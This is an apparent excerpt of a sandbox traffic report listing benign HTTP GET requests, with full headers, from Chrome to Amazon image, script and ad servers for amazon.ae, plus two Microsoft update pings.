    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Officefurniture_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/889509ef-90c0-4959-bd54-1a1faad422c6._CR0,0,700,700_AC_SX175_SY100_QL70_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JA6_dv6h66iD3gIHv_uvJpoAAAGRdjLkNwMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICA1J2Nd HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
    Source: global trafficHTTP traffic detected: GET /images/I/51dMriM2HlL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/McBZv0ZvnbehkIx.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/MV5yNztdnPUc5FB.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/d357b1d2-39e5-4349-8019-c0e0644649ee.mp4/r/THUMBNAIL_360P_FRAME_3_CAPTURE_2.JPG HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01A7wLYq2vL._RC%7C01MRSBg9CTL.css,21zzMQ5fUlL.css,01xaODxaooL.css,01-O+jnzjPL.css,01RKWvDyRmL.css,11vN9uFU0aL.css,01dowLSI-yL.css,01AKUUsTD-L.css,01hv3Lp4NiL.css,01Ztj3WUCTL.css,11w3VXiPfqL.css,01g8HvD83mL.css,11A49vOkbdL.css,01HduHxGhYL.css,01wSKuGOfjL.css,110rXrm3GaL.css,31B-6MDfR9L.css,117YsdQVf7L.css,01N1t6LCq6L.css,014ODqUQmLL.css,31xvR5bFfTL.css,61t0gSWOl7L.css,11uX19+eKhL.css,11m48LRhznL.css,11NtLukdkjL.css_.css?AUIClients/ProductUIServiceAssets-vrkzrcf5p7mia2ppuqe05j3jfq HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51f62XpPM+L._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51E89bvF-mL._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61gfdNg8jyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/614eD8BhoUL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71L9xtDPoLL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71F1yxjGeYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11mVszy8FIL.js?AUIClients/AmazonRushAssetLoader HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41k9TQrnHzL.js?AUIClients/AmazonRushFramework HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/21cuxCuJB9L.js?AUIClients/AmazonRushRouter HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71YXfRqyg3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JHu0Cp_6xtUcAjkkSpr-8WAAAAGRdjLkOQMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCMSks0 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61lJoq-YDAL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11XMgK3X1EL._RC%7C31PLWBroQRL.js,31Y5AkqmNvL.js,01WtpFkF58L.js,313k3X0MlqL.js,41STYmgYJcL.js,41E7GR6uegL.js,01r1r3sVlxL.js,21A1FsWcl5L.js,019dBqWurRL.js,11begzhl8OL.js,011VrMJVPzL.js,01XQQDMWkKL.js,012z3lMdhOL.js,11Exu1nsH7L.js,01b82LFIRTL.js,11UyW+59ZyL.js,015CwW0puPL.js,21UoUtkStoL.js,0164lSJukTL.js,219jZMsEOWL.js,01X+UeeJIKL.js,31ydWb2R4oL.js,01FA0ZefFJL.js,41sLQbGE0jL.js_.js?AUIClients/SearchAssets&4qcBlqbu HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51GRfnCRJBL._RC%7C01B3Yme5dLL.js,01j5DeZSMzL.js,31CuRA-rQfL.js,51M-SaPaAgL.js,01KTtrmeR5L.js,21RoFlDNKHL.js,41fFmJrK7zL.js,01N0G7oHRlL.js,31-hnA-p85L.js,118u4l1lw0L.js,01KVpvQDfZL.js,21XkditqCiL.js,0175nbnAD4L.js,01TF4KwVp5L.js,013F47KhYmL.js,21-qzi7P9VL.js,31qUHWTq-2L.js,21JVz3Jj7-L.js,01gkl49RM3L.js,011Y0pg8goL.js,010atgkqRqL.js,11HK5yarA+L.js,010dZST96oL.js,01UY0Z7k19L.js,215jXa7j8AL.js,51IaANPNPrL.js,31jzxcc0Q6L.js,01ly-sHeg8L.js,318qG8kymWL.js,018v226z-QL.js,21z34K3nOVL.js,31M8YAO7NgL.js,01993rJ5roL.js,01NCaKamrYL.js,011gqdvx+zL.js,01JzRVMDE6L.js,11wZIavy8WL.js,01dfGSDqqiL.js,01v8HNSpzuL.js,01GsEhoWBNL.js,01xShn6mQGL.js,012USBOk43L.js,21ZDIxQB3qL.js,61O+a0St5IL.js_.js?AUIClients/SearchPartnerAssets&dnYRJTGa HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_LargeAppliances_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Officefurniture_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/x-locale/common/grey-pixel.gif HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51qJO2LBrzL._AC_SR250,250_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71NBFetdoEL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
